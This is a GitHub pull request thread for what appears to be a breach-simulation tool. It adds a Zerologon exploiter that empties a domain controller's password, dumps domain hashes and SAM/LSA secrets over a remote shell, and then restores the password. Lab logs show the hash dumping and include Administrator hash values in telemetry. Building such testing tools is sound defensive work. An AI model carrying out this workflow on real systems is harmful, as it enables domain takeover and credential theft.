Zerologon Exploiter #911

shreyamalviya · 2020-12-27T18:38:22Z

Fixes #846

Workflow

exploit the system by changing the password to empty
DCSync and capture Administrator hashes; add to stolen creds and config for other exploiters to use
restore password (by starting a remote shell on the victim with the stolen Administrator credentials using wmiexec, saving the HKLM keys locally, and using those with secretsdump to get the DC account's original password)

Other notes

The current workflow is such that once a machine is exploited, no other exploits are run on it. However, using Zerologon, we're extracting credentials which are useful for other exploits. We need the other exploits to run after this one, even if it's successful. The modifications in HostExploiter and monkey.py handle that.

Stolen credentials are only gathered from system info collectors right now, but this exploiter changes that. There are changes in the telemetry and reporting parts for that.

monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py

acepace · 2020-12-28T17:52:45Z

As draft yeah, but for front end, need to mention CVE and mitigation steps and not just "patch"

shreyamalviya · 2021-02-01T07:26:47Z

Monkey Island screenshots

Map:

Security report:

ATT&CK report:

Monkey Agent logs

2021-01-31 19:30:25,523 [22996:140720124335936:INFO] monkey.try_exploiting.349: Trying to exploit VictimHost('192.168.56.5') with exploiter ZerologonExploiter...
2021-01-31 19:30:25,526 [22996:140720124335936:INFO] zerologon_fingerprint.get_host_fingerprint.32: Performing Zerologon authentication attempts...
2021-01-31 19:30:27,391 [22996:140720124335936:INFO] zerologon_fingerprint.get_host_fingerprint.46: Success: Domain Controller can be fully compromised by a Zerologon attack.
2021-01-31 19:30:27,391 [22996:140720124335936:INFO] zerologon._exploit_host.112: Target vulnerable, changing account password to empty string.
2021-01-31 19:30:27,405 [22996:140720124335936:DEBUG] zerologon._exploit_host.119: Attempting exploit.
2021-01-31 19:30:27,438 [22996:140720124335936:INFO] zerologon._exploit_host.141: Exploit complete!
2021-01-31 19:30:27,438 [22996:140720124335936:INFO] zerologon.restore_password.187: Restoring original password...
2021-01-31 19:30:27,439 [22996:140720124335936:DEBUG] zerologon.restore_password.189: DCSync; getting admin password's hashes.
2021-01-31 19:30:27,538 [22996:140720124335936:INFO] secretsdump.dump.2359: Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
2021-01-31 19:30:27,538 [22996:140720124335936:INFO] secretsdump.dump.2412: Using the DRSUAPI method to get NTDS.DIT secrets
2021-01-31 19:30:27,538 [22996:140720124335936:DEBUG] secretsdump.beginTransaction.1701: Session resume file will be sessionresume_sFWpcDpD
2021-01-31 19:30:27,669 [22996:140720124335936:DEBUG] secretsdump.DRSCrackNames.504: Calling DRSCrackNames for S-1-5-21-264987447-858749964-2518774918-500 
2021-01-31 19:30:27,677 [22996:140720124335936:DEBUG] secretsdump.DRSGetNCChanges.512: Calling DRSGetNCChanges for {ed1a125e-fc44-4285-a18c-7e8f2f1407db} 
2021-01-31 19:30:27,720 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2078: Entering NTDSHashes.__decryptHash
2021-01-31 19:30:27,721 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2189: Decrypting hash for user: CN=Administrator,CN=Users,DC=zlm,DC=com
2021-01-31 19:30:27,724 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2312: Leaving NTDSHashes.__decryptHash
2021-01-31 19:30:27,724 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.1962: Entering NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:27,731 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.2075: Leaving NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:27,746 [22996:140720124335936:DEBUG] secretsdump.DRSCrackNames.504: Calling DRSCrackNames for S-1-5-21-264987447-858749964-2518774918-501 
2021-01-31 19:30:27,751 [22996:140720124335936:DEBUG] secretsdump.DRSGetNCChanges.512: Calling DRSGetNCChanges for {2436997a-ec90-4de5-a00b-405daccaa769} 
2021-01-31 19:30:27,767 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2078: Entering NTDSHashes.__decryptHash
2021-01-31 19:30:27,767 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2189: Decrypting hash for user: CN=Guest,CN=Users,DC=zlm,DC=com
2021-01-31 19:30:27,769 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2312: Leaving NTDSHashes.__decryptHash
2021-01-31 19:30:27,769 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.1962: Entering NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:27,769 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.2075: Leaving NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:27,780 [22996:140720124335936:DEBUG] secretsdump.DRSCrackNames.504: Calling DRSCrackNames for S-1-5-21-264987447-858749964-2518774918-502 
2021-01-31 19:30:27,785 [22996:140720124335936:DEBUG] secretsdump.DRSGetNCChanges.512: Calling DRSGetNCChanges for {de5d24ed-89df-4e7f-ad42-f656a5934913} 
2021-01-31 19:30:27,821 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2078: Entering NTDSHashes.__decryptHash
2021-01-31 19:30:27,821 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2189: Decrypting hash for user: CN=krbtgt,CN=Users,DC=zlm,DC=com
2021-01-31 19:30:27,823 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2312: Leaving NTDSHashes.__decryptHash
2021-01-31 19:30:27,823 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.1962: Entering NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:27,830 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.2075: Leaving NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:27,849 [22996:140720124335936:DEBUG] secretsdump.DRSCrackNames.504: Calling DRSCrackNames for S-1-5-21-264987447-858749964-2518774918-503 
2021-01-31 19:30:27,857 [22996:140720124335936:DEBUG] secretsdump.DRSGetNCChanges.512: Calling DRSGetNCChanges for {8572ca00-43b3-4e1d-ae99-a1d163084bff} 
2021-01-31 19:30:27,878 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2078: Entering NTDSHashes.__decryptHash
2021-01-31 19:30:27,879 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2189: Decrypting hash for user: CN=DefaultAccount,CN=Users,DC=zlm,DC=com
2021-01-31 19:30:27,880 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2312: Leaving NTDSHashes.__decryptHash
2021-01-31 19:30:27,880 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.1962: Entering NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:27,881 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.2075: Leaving NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:27,893 [22996:140720124335936:DEBUG] secretsdump.DRSCrackNames.504: Calling DRSCrackNames for S-1-5-21-264987447-858749964-2518774918-1103 
2021-01-31 19:30:27,897 [22996:140720124335936:DEBUG] secretsdump.DRSGetNCChanges.512: Calling DRSGetNCChanges for {471a2e54-3b32-41d6-b3fe-f5499210f3db} 
2021-01-31 19:30:27,932 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2078: Entering NTDSHashes.__decryptHash
2021-01-31 19:30:27,932 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2189: Decrypting hash for user: CN=sheru,DC=zlm,DC=com
2021-01-31 19:30:27,935 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2312: Leaving NTDSHashes.__decryptHash
2021-01-31 19:30:27,935 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.1962: Entering NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:27,941 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.2075: Leaving NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:27,962 [22996:140720124335936:DEBUG] secretsdump.DRSCrackNames.504: Calling DRSCrackNames for S-1-5-21-264987447-858749964-2518774918-1105 
2021-01-31 19:30:27,972 [22996:140720124335936:DEBUG] secretsdump.DRSGetNCChanges.512: Calling DRSGetNCChanges for {4efbb6ed-1559-4c41-b5ec-e59afeb0db04} 
2021-01-31 19:30:28,018 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2078: Entering NTDSHashes.__decryptHash
2021-01-31 19:30:28,018 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2189: Decrypting hash for user: CN=xyz,CN=Users,DC=zlm,DC=com
2021-01-31 19:30:28,020 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2312: Leaving NTDSHashes.__decryptHash
2021-01-31 19:30:28,020 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.1962: Entering NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:28,043 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.2075: Leaving NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:28,060 [22996:140720124335936:DEBUG] secretsdump.DRSCrackNames.504: Calling DRSCrackNames for S-1-5-21-264987447-858749964-2518774918-1000 
2021-01-31 19:30:28,088 [22996:140720124335936:DEBUG] secretsdump.DRSGetNCChanges.512: Calling DRSGetNCChanges for {0f73e115-5217-4962-b7b3-373532e64e73} 
2021-01-31 19:30:28,118 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2078: Entering NTDSHashes.__decryptHash
2021-01-31 19:30:28,118 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2189: Decrypting hash for user: CN=ZLM,OU=Domain Controllers,DC=zlm,DC=com
2021-01-31 19:30:28,120 [22996:140720124335936:DEBUG] secretsdump.__decryptHash.2312: Leaving NTDSHashes.__decryptHash
2021-01-31 19:30:28,120 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.1962: Entering NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:28,126 [22996:140720124335936:DEBUG] secretsdump.__decryptSupplementalInfo.2075: Leaving NTDSHashes.__decryptSupplementalInfo
2021-01-31 19:30:28,160 [22996:140720124335936:DEBUG] secretsdump.dump.2532: Finished processing and printing user's hashes, now printing supplemental information
2021-01-31 19:30:28,160 [22996:140720124335936:INFO] secretsdump.dump.2538: Kerberos keys grabbed
2021-01-31 19:30:28,161 [22996:140720124335936:DEBUG] zerologon.cleanup.571: Cleaning up...
2021-01-31 19:30:28,166 [22996:140720124335936:DEBUG] zerologon.restore_password.196: Getting original DC password's nthash.
2021-01-31 19:30:28,166 [22996:140720124335936:DEBUG] zerologon.save_HKLM_keys_locally.277: Starting remote shell on victim.
2021-01-31 19:30:28,264 [22996:140720124335936:DEBUG] dcomrt.connect.1238: Target system is 192.168.56.5 and isFDQN is False
2021-01-31 19:30:28,264 [22996:140720124335936:DEBUG] dcomrt.connect.1246: StringBinding: \\\\ZLM[\\PIPE\\atsvc]
2021-01-31 19:30:28,264 [22996:140720124335936:DEBUG] dcomrt.connect.1246: StringBinding: ZLM[49666]
2021-01-31 19:30:28,264 [22996:140720124335936:DEBUG] dcomrt.connect.1246: StringBinding: 10.0.2.15[49666]
2021-01-31 19:30:28,265 [22996:140720124335936:DEBUG] dcomrt.connect.1246: StringBinding: 192.168.56.5[49666]
2021-01-31 19:30:28,265 [22996:140720124335936:DEBUG] dcomrt.connect.1269: StringBinding chosen: ncacn_ip_tcp:192.168.56.5[49666]
2021-01-31 19:30:30,342 [22996:140720124335936:INFO] zerologon.do_get.671: Downloading C:\\system.save
2021-01-31 19:30:30,643 [22996:140720124335936:INFO] zerologon.do_get.671: Downloading C:\\sam.save
2021-01-31 19:30:30,675 [22996:140720124335936:INFO] zerologon.do_get.671: Downloading C:\\security.save
2021-01-31 19:30:30,829 [22996:140720124335936:DEBUG] zerologon.save_HKLM_keys_locally.302: Getting victim HKLM keys via remote shell: The operation completed successfully.



2021-01-31 19:30:30,853 [22996:140720124335936:DEBUG] secretsdump.getBootKey.2590: Retrieving class info for JD
2021-01-31 19:30:30,861 [22996:140720124335936:DEBUG] winregistry.__getBlock.212: Unknown type 0xb'f\x00'
2021-01-31 19:30:30,861 [22996:140720124335936:DEBUG] secretsdump.getBootKey.2590: Retrieving class info for Skew1
2021-01-31 19:30:30,868 [22996:140720124335936:DEBUG] winregistry.__getBlock.212: Unknown type 0xb'2\x00'
2021-01-31 19:30:30,868 [22996:140720124335936:DEBUG] secretsdump.getBootKey.2590: Retrieving class info for GBG
2021-01-31 19:30:30,877 [22996:140720124335936:DEBUG] winregistry.__getBlock.212: Unknown type 0xb'c\x00'
2021-01-31 19:30:30,877 [22996:140720124335936:DEBUG] secretsdump.getBootKey.2590: Retrieving class info for Data
2021-01-31 19:30:30,883 [22996:140720124335936:DEBUG] winregistry.__getBlock.212: Unknown type 0xb'9\x00'
2021-01-31 19:30:30,883 [22996:140720124335936:INFO] secretsdump.getBootKey.2602: Target system bootKey: 0xc7e4245ffec62b69f06142994d06d558
2021-01-31 19:30:30,914 [22996:140720124335936:INFO] secretsdump.dump.1210: Dumping local SAM hashes (uid:rid:lmhash:nthash)
2021-01-31 19:30:30,914 [22996:140720124335936:DEBUG] secretsdump.getHBootKey.1155: Calculating HashedBootKey from SAM
2021-01-31 19:30:30,948 [22996:140720124335936:DEBUG] secretsdump.dump.1250: NewStyle hashes is: True
2021-01-31 19:30:30,967 [22996:140720124335936:DEBUG] secretsdump.dump.1250: NewStyle hashes is: True
2021-01-31 19:30:30,983 [22996:140720124335936:DEBUG] secretsdump.dump.1250: NewStyle hashes is: True
2021-01-31 19:30:31,026 [22996:140720124335936:INFO] secretsdump.dumpCachedHashes.1404: Dumping cached domain logon information (domain/username:hash)
2021-01-31 19:30:31,030 [22996:140720124335936:DEBUG] secretsdump.__getLSASecretKey.1367: Decrypting LSA Key
2021-01-31 19:30:31,037 [22996:140720124335936:DEBUG] secretsdump.__getNLKMSecret.1382: Decrypting NL$KM
2021-01-31 19:30:31,046 [22996:140720124335936:DEBUG] secretsdump.dumpCachedHashes.1432: Looking into NL$1
2021-01-31 19:30:31,051 [22996:140720124335936:DEBUG] secretsdump.dumpCachedHashes.1432: Looking into NL$2
2021-01-31 19:30:31,061 [22996:140720124335936:DEBUG] secretsdump.dumpCachedHashes.1432: Looking into NL$3
2021-01-31 19:30:31,073 [22996:140720124335936:DEBUG] secretsdump.dumpCachedHashes.1432: Looking into NL$4
2021-01-31 19:30:31,082 [22996:140720124335936:DEBUG] secretsdump.dumpCachedHashes.1432: Looking into NL$5
2021-01-31 19:30:31,092 [22996:140720124335936:DEBUG] secretsdump.dumpCachedHashes.1432: Looking into NL$6
2021-01-31 19:30:31,104 [22996:140720124335936:DEBUG] secretsdump.dumpCachedHashes.1432: Looking into NL$7
2021-01-31 19:30:31,114 [22996:140720124335936:DEBUG] secretsdump.dumpCachedHashes.1432: Looking into NL$8
2021-01-31 19:30:31,125 [22996:140720124335936:DEBUG] secretsdump.dumpCachedHashes.1432: Looking into NL$9
2021-01-31 19:30:31,131 [22996:140720124335936:DEBUG] secretsdump.dumpCachedHashes.1432: Looking into NL$10
2021-01-31 19:30:31,136 [22996:140720124335936:INFO] secretsdump.dumpSecrets.1603: Dumping LSA Secrets
2021-01-31 19:30:31,146 [22996:140720124335936:DEBUG] secretsdump.dumpSecrets.1620: Looking into $MACHINE.ACC
2021-01-31 19:30:31,158 [22996:140720124335936:INFO] secretsdump.__printSecret.1476: $MACHINE.ACC 
2021-01-31 19:30:31,159 [22996:140720124335936:DEBUG] secretsdump.__printSecret.1546: Could not calculate machine account Kerberos keys, only printing plain password (hex encoded)
2021-01-31 19:30:31,159 [22996:140720124335936:DEBUG] secretsdump.dumpSecrets.1620: Looking into DPAPI_SYSTEM
2021-01-31 19:30:31,171 [22996:140720124335936:INFO] secretsdump.__printSecret.1476: DPAPI_SYSTEM 
2021-01-31 19:30:31,171 [22996:140720124335936:DEBUG] secretsdump.dumpSecrets.1620: Looking into NL$KM
2021-01-31 19:30:31,184 [22996:140720124335936:INFO] secretsdump.__printSecret.1476: NL$KM 
2021-01-31 19:30:31,184 [22996:140720124335936:DEBUG] zerologon.cleanup.571: Cleaning up...
2021-01-31 19:30:31,185 [22996:140720124335936:DEBUG] zerologon.restore_password.202: Attempting password restoration.
2021-01-31 19:30:32,449 [22996:140720124335936:DEBUG] zerologon.restore_password.209: DC machine account password should be restored to its original value.
2021-01-31 19:30:32,449 [22996:140720124335936:INFO] zerologon._exploit_host.154: System exploited and password restored successfully.
2021-01-31 19:30:32,449 [22996:140720124335936:INFO] monkey.successfully_exploited.384: Successfully propagated to Victim Host 192.168.56.5: OS - [type-windows ] Services - [tcp-135-{'display_name': 'unknown(TCP)', 'port': 135} NTLM (NT LAN Manager)-{'display_name': 'NTLM (NT LAN Manager)', 'port': '', 'is_vulnerable': True} ] target monkey: None using ZerologonExploiter
2021-01-31 19:30:32,450 [22996:140720124335936:DEBUG] base_telem.send.29: Sending exploit telemetry. Data: {"result": true, "machine": {"ip_addr": "192.168.56.5", "domain_name": "", "os": {"type": "windows"}, "services": {"tcp-135": {"display_name": "unknown(TCP)", "port": 135}, "NTLM (NT LAN Manager)": {"display_name": "NTLM (NT LAN Manager)", "port": "", "is_vulnerable": true}}, "monkey_exe": null, "default_tunnel": "192.168.56.1:18216", "default_server": "192.168.56.1:5000"}, "exploiter": "ZerologonExploiter", "info": {"display_name": "Netlogon", "started": "2021-01-31T19:30:25.523934", "finished": "2021-01-31T19:30:32.449748", "vulnerable_urls": [], "vulnerable_ports": [], "executed_cmds": [], "credentials": {"Administrator": {"username": "Administrator", "password": "", "lm_hash": "aad3b435b51404eeaad3b435b51404ee", "ntlm_hash": "bf9db225620b7565c09d035ef572c57b"}}}, "attempts": [{"result": true, "user": "ZLM", "password": "", "lm_hash": "", "ntlm_hash": "", "ssh_key": ""}]}
2021-01-31 19:30:32,451 [22996:140720124335936:DEBUG] connectionpool._new_conn.943: Starting new HTTPS connection (1): 192.168.1.37:5000
2021-01-31 19:30:32,558 [22996:140720124335936:DEBUG] connectionpool._make_request.442: https://192.168.1.37:5000 "POST /api/telemetry HTTP/1.1" 200 1117
2021-01-31 19:30:32,605 [22996:140720124335936:DEBUG] base_telem.send.29: Sending attack telemetry. Data: {"status": 2, "technique": "T1210", "machine": {"domain_name": "", "ip_addr": "192.168.56.5"}}
2021-01-31 19:30:32,607 [22996:140720124335936:DEBUG] connectionpool._new_conn.943: Starting new HTTPS connection (1): 192.168.1.37:5000
2021-01-31 19:30:32,630 [22996:140720124335936:DEBUG] connectionpool._make_request.442: https://192.168.1.37:5000 "POST /api/telemetry HTTP/1.1" 200 323
2021-01-31 19:30:32,673 [22996:140720124335936:INFO] monkey.try_exploiting.349: Trying to exploit VictimHost('192.168.56.5') with exploiter SmbExploiter...

codecov · 2021-02-01T08:30:11Z

Codecov Report

Merging #911 (43cac35) into develop (978927c) will increase coverage by 4.05%.
The diff coverage is n/a.

@@             Coverage Diff             @@
##           develop     #911      +/-   ##
===========================================
+ Coverage    22.06%   26.11%   +4.05%     
===========================================
  Files          339      402      +63     
  Lines        11500    12821    +1321     
===========================================
+ Hits          2537     3348     +811     
- Misses        8963     9473     +510

Impacted Files	Coverage Δ
...land/cc/services/attack/technique_reports/T1156.py
.../infection_monkey/system_info/netstat_collector.py
...info/windows_cred_collector/windows_credentials.py
...on_monkey/post_breach/actions/discover_accounts.py
monkey/monkey_island/cc/resources/monkey.py
...onkey/monkey_island/cc/resources/auth/auth_user.py
monkey/common/cloud/azure/azure_instance.py
...y_island/cc/services/attack/mitre_api_interface.py
monkey/infection_monkey/network/firewall.py
...fection_monkey/system_info/linux_info_collector.py
... and 722 more

Continue to review full report at Codecov.

Legend - Click here to learn more
Δ = absolute <relative> (impact), ø = not affected, ? = missing data
Powered by Codecov. Last update 978927c...43cac35. Read the comment docs.

monkey/infection_monkey/exploit/zerologon.py

monkey/infection_monkey/network/zerologon_fingerprint.py

monkey/infection_monkey/monkey.py

monkey/infection_monkey/exploit/HostExploiter.py

monkey/infection_monkey/exploit/zerologon.py

monkey/infection_monkey/network/zerologon_fingerprint.py

monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py

monkey/monkey_island/cc/services/reporting/report.py

monkey/monkey_island/cc/services/telemetry/processing/exploit.py

monkey/monkey_island/cc/services/reporting/report.py

monkey/infection_monkey/exploit/HostExploiter.py

monkey/infection_monkey/exploit/zerologon.py

TODO: - impacket license - get pwd for some other users if 'Administrator' doesn't exist (and save all users' creds?) - unit tests

… isn't found and save all other credentials

+ other little CR changes

…rologon exploiter)

monkey/infection_monkey/exploit/zerologon.py

monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py

monkey/infection_monkey/exploit/zerologon.py

mssalvatore · 2021-02-22T17:12:23Z

monkey/infection_monkey/exploit/tests/zerologon_utils/test_vuln_assessment.py

+
+
+def test_get_dc_details_multiple_netbios_names(host, monkeypatch):
+    def mock_queryIPForName(*args, **kwargs):


This is technically a stub, not a mock: https://martinfowler.com/bliki/TestDouble.html

mssalvatore · 2021-02-22T17:15:54Z

monkey/infection_monkey/exploit/tests/zerologon_utils/test_vuln_assessment.py

+    def mock_queryIPForName(*args, **kwargs):
+        return NETBIOS_NAMES
+
+    monkeypatch.setattr(NetBIOS, "queryIPForName", mock_queryIPForName)
+


What if we create a function that accepts NETBIOS_NAMES as a parameter and patches NetBIOS appropriately? Then this code wont be duplicated in 2 tests.

ghost · 2021-02-23T08:33:58Z

DeepCode's analysis on #43cac3 found:

⚠️ 1 warning 👇

Top issues

Description	Example fixes
Missing close for connect, add close or use a with block. Occurrences: zerologon.py:78	🔧 Example fixes

👉 View analysis in DeepCode’s Dashboard | Configure the bot

monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py

Co-authored-by: Mike Salvatore <mike.s.salvatore@gmail.com>

acepace reviewed Dec 28, 2020

View reviewed changes

monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py Outdated Show resolved Hide resolved

shreyamalviya force-pushed the zerologon-exploiter branch from f9f9f59 to 2d42222 Compare January 9, 2021 19:12

shreyamalviya force-pushed the zerologon-exploiter branch from 2d42222 to e0134a8 Compare January 31, 2021 14:51

shreyamalviya force-pushed the zerologon-exploiter branch from 63c2309 to 42e3090 Compare February 1, 2021 07:28

shreyamalviya marked this pull request as ready for review February 1, 2021 07:32

shreyamalviya force-pushed the zerologon-exploiter branch from 42e3090 to 98b9997 Compare February 1, 2021 08:20

acepace reviewed Feb 1, 2021

View reviewed changes

monkey/infection_monkey/exploit/zerologon.py Outdated Show resolved Hide resolved

acepace reviewed Feb 1, 2021

View reviewed changes

monkey/infection_monkey/network/zerologon_fingerprint.py Outdated Show resolved Hide resolved

acepace reviewed Feb 1, 2021

View reviewed changes

monkey/infection_monkey/network/zerologon_fingerprint.py Outdated Show resolved Hide resolved

acepace reviewed Feb 1, 2021

View reviewed changes

monkey/infection_monkey/monkey.py Outdated Show resolved Hide resolved

acepace reviewed Feb 1, 2021

View reviewed changes

monkey/infection_monkey/exploit/HostExploiter.py Outdated Show resolved Hide resolved

acepace reviewed Feb 1, 2021

View reviewed changes

monkey/infection_monkey/exploit/zerologon.py Outdated Show resolved Hide resolved